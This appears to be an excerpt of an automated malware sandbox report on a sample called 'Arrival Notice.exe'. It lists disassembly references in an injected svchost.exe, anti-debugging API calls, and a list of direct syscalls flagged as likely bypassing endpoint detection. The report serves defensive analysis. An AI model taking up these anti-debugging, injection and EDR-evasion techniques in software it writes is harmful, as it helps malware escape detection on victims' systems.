Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382645D mov eax, dword ptr fs:[00000030h]	7_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385245A mov eax, dword ptr fs:[00000030h]	7_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BC460 mov ecx, dword ptr fs:[00000030h]	7_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]	7_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]	7_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]	7_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840BBE mov eax, dword ptr fs:[00000030h]	7_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840BBE mov eax, dword ptr fs:[00000030h]	7_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	7_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	7_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]	7_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]	7_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]	7_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]	7_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]	7_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]	7_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	7_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]	7_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]	7_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]	7_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385EBFC mov eax, dword ptr fs:[00000030h]	7_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	7_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]	7_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385EB20 mov eax, dword ptr fs:[00000030h]	7_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385EB20 mov eax, dword ptr fs:[00000030h]	7_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F8B28 mov eax, dword ptr fs:[00000030h]	7_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F8B28 mov eax, dword ptr fs:[00000030h]	7_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E4B4B mov eax, dword ptr fs:[00000030h]	7_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E4B4B mov eax, dword ptr fs:[00000030h]	7_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6B40 mov eax, dword ptr fs:[00000030h]	7_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6B40 mov eax, dword ptr fs:[00000030h]	7_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FAB40 mov eax, dword ptr fs:[00000030h]	7_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D8B42 mov eax, dword ptr fs:[00000030h]	7_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DEB50 mov eax, dword ptr fs:[00000030h]	7_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382CB7E mov eax, dword ptr fs:[00000030h]	7_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904A80 mov eax, dword ptr fs:[00000030h]	7_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03868A90 mov edx, dword ptr fs:[00000030h]	7_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838AA0 mov eax, dword ptr fs:[00000030h]	7_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838AA0 mov eax, dword ptr fs:[00000030h]	7_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03886AA4 mov eax, dword ptr fs:[00000030h]	7_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]	7_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]	7_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]	7_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830AD0 mov eax, dword ptr fs:[00000030h]	7_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03864AD0 mov eax, dword ptr fs:[00000030h]	7_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03864AD0 mov eax, dword ptr fs:[00000030h]	7_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386AAEE mov eax, dword ptr fs:[00000030h]	7_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386AAEE mov eax, dword ptr fs:[00000030h]	7_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BCA11 mov eax, dword ptr fs:[00000030h]	7_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CA24 mov eax, dword ptr fs:[00000030h]	7_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385EA2E mov eax, dword ptr fs:[00000030h]	7_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03854A35 mov eax, dword ptr fs:[00000030h]	7_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03854A35 mov eax, dword ptr fs:[00000030h]	7_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CA38 mov eax, dword ptr fs:[00000030h]	7_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]	7_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840A5B mov eax, dword ptr fs:[00000030h]	7_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840A5B mov eax, dword ptr fs:[00000030h]	7_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]	7_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]	7_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]	7_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DEA60 mov eax, dword ptr fs:[00000030h]	7_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038ACA72 mov eax, dword ptr fs:[00000030h]	7_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038ACA72 mov eax, dword ptr fs:[00000030h]	7_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038309AD mov eax, dword ptr fs:[00000030h]	7_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038309AD mov eax, dword ptr fs:[00000030h]	7_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B89B3 mov esi, dword ptr fs:[00000030h]	7_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B89B3 mov eax, dword ptr fs:[00000030h]	7_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B89B3 mov eax, dword ptr fs:[00000030h]	7_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C69C0 mov eax, dword ptr fs:[00000030h]	7_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038649D0 mov eax, dword ptr fs:[00000030h]	7_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	7_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	7_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038629F9 mov eax, dword ptr fs:[00000030h]	7_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038629F9 mov eax, dword ptr fs:[00000030h]	7_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE908 mov eax, dword ptr fs:[00000030h]	7_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE908 mov eax, dword ptr fs:[00000030h]	7_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BC912 mov eax, dword ptr fs:[00000030h]	7_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03828918 mov eax, dword ptr fs:[00000030h]	7_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03828918 mov eax, dword ptr fs:[00000030h]	7_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B892A mov eax, dword ptr fs:[00000030h]	7_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C892B mov eax, dword ptr fs:[00000030h]	7_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B0946 mov eax, dword ptr fs:[00000030h]	7_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]	7_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]	7_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]	7_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0387096E mov eax, dword ptr fs:[00000030h]	7_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0387096E mov edx, dword ptr fs:[00000030h]	7_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0387096E mov eax, dword ptr fs:[00000030h]	7_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D4978 mov eax, dword ptr fs:[00000030h]	7_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D4978 mov eax, dword ptr fs:[00000030h]	7_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BC97C mov eax, dword ptr fs:[00000030h]	7_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830887 mov eax, dword ptr fs:[00000030h]	7_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BC89D mov eax, dword ptr fs:[00000030h]	7_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	7_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	7_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BC810 mov eax, dword ptr fs:[00000030h]	7_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov ecx, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]	7_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A830 mov eax, dword ptr fs:[00000030h]	7_2_0386A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D483A mov eax, dword ptr fs:[00000030h]	7_2_038D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D483A mov eax, dword ptr fs:[00000030h]	7_2_038D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03842840 mov ecx, dword ptr fs:[00000030h]	7_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03860854 mov eax, dword ptr fs:[00000030h]	7_2_03860854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834859 mov eax, dword ptr fs:[00000030h]	7_2_03834859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834859 mov eax, dword ptr fs:[00000030h]	7_2_03834859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BE872 mov eax, dword ptr fs:[00000030h]	7_2_038BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BE872 mov eax, dword ptr fs:[00000030h]	7_2_038BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6870 mov eax, dword ptr fs:[00000030h]	7_2_038C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6870 mov eax, dword ptr fs:[00000030h]	7_2_038C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386CF80 mov eax, dword ptr fs:[00000030h]	7_2_0386CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03862F98 mov eax, dword ptr fs:[00000030h]	7_2_03862F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03862F98 mov eax, dword ptr fs:[00000030h]	7_2_03862F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03832FC8 mov eax, dword ptr fs:[00000030h]	7_2_03832FC8

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_004238DA

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,	0_2_0041F250
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041A208
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
